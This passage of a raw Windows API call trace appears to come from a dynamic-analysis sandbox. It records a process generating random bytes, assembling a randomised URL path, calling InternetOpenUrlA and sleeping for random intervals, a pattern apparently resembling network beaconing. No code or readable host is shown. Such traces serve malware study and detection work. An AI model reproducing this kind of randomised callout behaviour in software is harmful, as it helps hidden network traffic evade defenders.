lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0200.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.787] GetProcessHeap () returned 0x440000 [0200.787] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0200.788] lstrcpyA (in: lpString1=0x473da0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0200.788] lstrcatA (in: lpString1="\x81\x03", lpString2="/pHimasqbcQ56oicw9iailh3538fvbb1e5c/voj6zaocm0rukf2eb0zeaopjec3weeswi7xkzcw/34mll11vxA0j1j2qjlEeQrc4i/g0ICnrkwly3w1ddsaxEyrgborcsKr0k/wgdvxpa5nvjvska2lpbqj8Ym1jbQpKTe5/" | out: lpString1="\x81\x03/pHimasqbcQ56oicw9iailh3538fvbb1e5c/voj6zaocm0rukf2eb0zeaopjec3weeswi7xkzcw/34mll11vxA0j1j2qjlEeQrc4i/g0ICnrkwly3w1ddsaxEyrgborcsKr0k/wgdvxpa5nvjvska2lpbqj8Ym1jbQpKTe5/") returned="\x81\x03/pHimasqbcQ56oicw9iailh3538fvbb1e5c/voj6zaocm0rukf2eb0zeaopjec3weeswi7xkzcw/34mll11vxA0j1j2qjlEeQrc4i/g0ICnrkwly3w1ddsaxEyrgborcsKr0k/wgdvxpa5nvjvska2lpbqj8Ym1jbQpKTe5/" [0200.788] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0200.788] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/pHimasqbcQ56oicw9iailh3538fvbb1e5c/voj6zaocm0rukf2eb0zeaopjec3weeswi7xkzcw/34mll11vxA0j1j2qjlEeQrc4i/g0ICnrkwly3w1ddsaxEyrgborcsKr0k/wgdvxpa5nvjvska2lpbqj8Ym1jbQpKTe5/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0200.788] GetProcessHeap () returned 0x440000 [0200.788] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0200.788] GetProcessHeap () returned 0x440000 [0200.788] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02850 | out: hHeap=0x440000) returned 1 [0200.789] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0200.789] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0200.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0201.080] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0201.080] Sleep (dwMilliseconds=0xf832) [0201.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0201.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0201.409] GetProcessHeap () returned 0x440000 [0201.409] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0201.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0201.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0201.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0201.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0201.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e32, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x4d5e32) returned 0x0 [0201.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0201.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e5c, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4d5e5c) returned 0x0 [0201.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0201.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0201.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e73, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d5e73) returned 0x0 [0201.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | 